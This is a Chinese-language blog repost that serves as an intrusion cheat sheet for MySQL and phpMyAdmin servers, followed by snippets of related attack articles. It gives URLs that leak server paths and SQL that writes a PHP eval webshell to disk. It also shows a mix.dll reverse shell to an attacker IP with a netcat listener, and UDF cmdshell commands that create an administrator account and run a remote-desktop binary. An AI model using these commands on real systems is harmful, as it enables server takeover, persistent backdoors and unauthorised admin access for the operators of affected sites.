利用Mysql和PHPmyadmin提权入侵

最新推荐文章于 2021-03-21 12:48:47 发布
最新推荐文章于 2021-03-21 12:48:47 发布
阅读量214 收藏
点赞数
文章标签: 数据库 php
原文链接:http://www.cnblogs.com/mujj/articles/1998292.html
版权
1:phpmyadmin 后台拿webshell 
phpmyadmin爆路径方法: 
weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php 
http://url/phpmyadmin/libraries/select_lang.lib.php 
pphpmyadmin/libraries/export/xls.php 
phpmyadmin/themes/darkblue_orange/layout.inc.php 

D:\usr\www\html\phpMyAdmin\ 
----start code--- 
Create TABLE a (cmd text NOT NULL); 
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>'); 
select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php'; 
Drop TABLE IF EXISTS a; 
----end code--- 

2:mix.dll提权 
D:/usr/www/html/mix.dll 
mysql -h 目标ip -uroot -p 
\. c:\mysql.txt 
select Mixconnect('反弹ip','端口'); 
nc -vv -l -p 1983 

3:udf.dll提权 
create function cmdshell returns string soname 'udf.dll' 
select cmdshell('net user user password /add'); 
select cmdshell('net localgroup administrators user /add'); 
select cmdshell('c:\3389.exe'); 
drop function cmdshell; 删除函数 
select cmdshell('netstat -an'); 
load data infile "d:\\www\\gb\\about\\about.htm" into table tmp; 
判断文件存不存在mysql的语句 

转载于:https://www.cnblogs.com/mujj/articles/1998292.html

weixin_30522183
关注
CVE-2018-12613phpMyAdmin文件包含漏洞复现
顶峰
03-29 650
漏洞
mysql mof提权_MySQL提权之mof提权
weixin_42498989的博客
01-19 733
mof提权原理关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。下面简单演示下 mof 提权的过程!MOF提权的条件要求十分严苛:1.windows 03及以下版本2.mysql启动身份具有权限去读写c:/windows...
phpmyadmin入侵实例
qw_xingzhe的专栏
08-08 2618
今天我们内部群的朋友在群里测试下面这站,我把这过程记录保存,方便以后查阅: http://xx.xx.211.14/school/pub/index_detail.php?fr=&flag=&id=1824 在浏览器中打开,看看有没有注入: http://xxxxxxxxx/school/pub/index_detail.php?fr=&flag=&id=1824’
PhpMyAdmin 入侵
12-12 1647
google 搜索 Runtime Information inurl:phpmyadmin 1.如何拿到登陆密码. 自己想办法 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径. 3.选择一个Database.运行以下语句. ----start code--- Create TABLE a (cmd tex
php没有phpmyadmin则么么入侵,PHP文件包含&phpMyAdmin4.8.1漏洞分析
weixin_35044481的博客
03-21 150
文件包含所涉及的函数include:被包含文件先按参数给出的路径寻找,如果没有给出目录(只有文件名)时则按照 [include_path] 指定的目录寻找。如果在 [include_path]下没找到该文件则 include 最后才在调用脚本文件所在的目录和当前工作目录下寻找。如果最后仍未找到文件则 include 结构会发出一条警告;这一点和 [require]不同,后者会发出一个致命错误。in...
关于PHPMYADMIN入侵提权拿服务器
u011500307的专栏
12-01 1万+
转自:http://hi.baidu.com/0o1znz1ow/item/651d3bddbd9b7cf03cc2cb1e 作者不详 关于PHPMYADMIN入侵提权拿服务器 1.今天收到客户一个单子,说是要黑一台电影服务器,然后给了我IP 61.147.*.* 打开网站一看,发现是用FLEAPHP写的一个程序 因为刚好在研究FLEAPHP开源开发系统,大致了
php检测 Phpmyadmin提权漏洞演示
07-21
【压缩包子文件的文件名称列表】:“Phpmyadmin提权漏洞演示.exe”可能是一个执行文件,包含了一个模拟的环境或工具,用于演示如何检测和利用Phpmyadmin提权漏洞。这个文件可能包含了模拟攻击的步骤、漏洞利用的...
护卫神mysql提权_护卫神主机大师提权漏洞利用分析
weixin_32534653的博客
01-27 394
*本文原创作者:Freedom,本文属FreeBuf原创奖励计划,未经许可禁止转载0x01 前言护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机、SQL Server和MySQL;Web方式管理,拥有独立前台和后台面板。支持Windows Server 2008/2012。结合护卫神...
【渗透测试】--- 利用phpmyadmin来getshell
qq_43168364的博客
12-24 660
利用phpmyadmin来getshell有两种方式 1、利用into outfile直接将一句话写入文件中 2、利用Mysql的日志文件getshell 不论是那种方式都要满足以下三个条件: 未限制文件路径 secure_file_priv= 当前用户有写文件权限 知道网站根目录 — C:\phpStudy\PHPTutorial\WWW 第一种方法 select "<?php phpinfo();?>" into outfile "/var/www/html/tes
利用phpStudy 探针 提权网站服务器
热门推荐
逆向思维
03-04 1万+
声明:本教程仅仅是演示管理员安全意识不强,存在弱口令情况.网站被非法入侵的演示,请勿用于恶意用途! 今天看到论坛有人发布了一个通过这phpStudy 探针 关键字搜索检索提权网址服务器,这个挺简单的.记录一下吧。 搜索引擎KeyWord: phpStudy 探针 2014 多往后翻翻。翻个几十页最好。 点开搜索到的内容。 1. 点开搜索到的内容。2. 翻到最下面,尝试连接mysql数据库是否正常(账
phpmyadmin弱口令批量利用3传(ok)
06-29
phpmyadmin弱口令批量利用3传(ok) 批量执行,仅供网络测试
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
Linux 再爆 root 帐号提权漏洞
丛中笑的专栏
12-10 594
<br /><br />系统安全高手 Dan Rosenberg 发布了一段 C 程序, 这段200多行的程序利用了 Linux Econet 协议的3个安全漏洞,可以导致本地帐号对系统进行拒绝服务或特权提升,也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell,以下在 update 过的 Ubuntu 10.04 Server LTS 上测试通过:<br />$ sudo apt-get update<br />$ sudo apt-get upgrade<br /><br />$ u
phpmyadmin mysql提权_phpMyadmin提权那些事
weixin_34638282的博客
01-20 218
phpMyadmin提权那些事引言:在渗透测试过程中获知到phpMyadmin的账号密码,如何进行提权呢?往下看,我今天和你说说phpMyadmin提权那些事。0×00 定义​ phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL数据库管理工具,让管理者可用Web接口管理MySQL数据库。0×01 环境准备目标: Windows Serve...
php没有phpmyadmin则么么入侵,不允许访问phpmyadmin怎么办
weixin_39841572的博客
03-21 123
解决没有权限访问phpmyadmin问题由于我安装wampserver时80端口被占用,于是将默认端口改为8080,然后问题就来了,当我登录phpmyadmin时,总是跳出“You don’t have permission to access /phpmyadmin/ on this server.”说我没有权限访问phpmyadmin,我在网上找了解决办法,并分享一下。打开 httpd.con...
phpmyadmin mysql提权_phpMyadmin提权技巧
weixin_26795171的博客
01-28 502
定义phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL数据库管理工具,让管理者可用Web接口管理MySQL数据库。环境准备目标:WindowsServer2003Enterprisex64Edition192.168.17.137攻击机:window7192.168.17.132Php:5.45Mysql:5.5.53Apac...
修复网站漏洞对phpmyadmin防止被入侵提权的解决办法
weixin_34005042的博客
11-20 385
phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多一些,最近phpmysql爆出漏洞,尤其是弱口令,sql注入漏洞,都会导致mysql的数据账号密码被泄露,那么如何通过phpmyadmin来上传提权webshell呢 首先我们来搭建一下PHP+mysql环境,linux centos系统,PHP的版本是5.3,my...
phpMyAdmin要嵌入到已有的界面
bjx18356163055的博客
02-13 497
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,
phpmyadmin getshell到提权
weixin_42035825的博客
03-21 382
环境准备 靶机:win7 32 位。 环境: php:5.45 MYsql:5.5.53 Apache:2.43 开始试验 使用nmap扫描目标机端口及服务情况。 nmap -sV ip a.发现该目标机的3306端口开放,使用namp自带的mysql弱口令脚本进行爆破; nmap -p 3306 --script=mysql-brute ip b.也可以通过目录爆破等方法找到phpmyadm...
批量导入Excel到MySQLphpMyAdmin教程
在处理IT项目时,特别是在PHP开发环境中,...使用phpMyAdmin批量导入Excel内容到MySQL是一项常见的数据库管理操作,关键在于数据格式的适配和正确设置参数。遵循上述步骤,结合实际场景,你应该能够顺利完成这项任务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值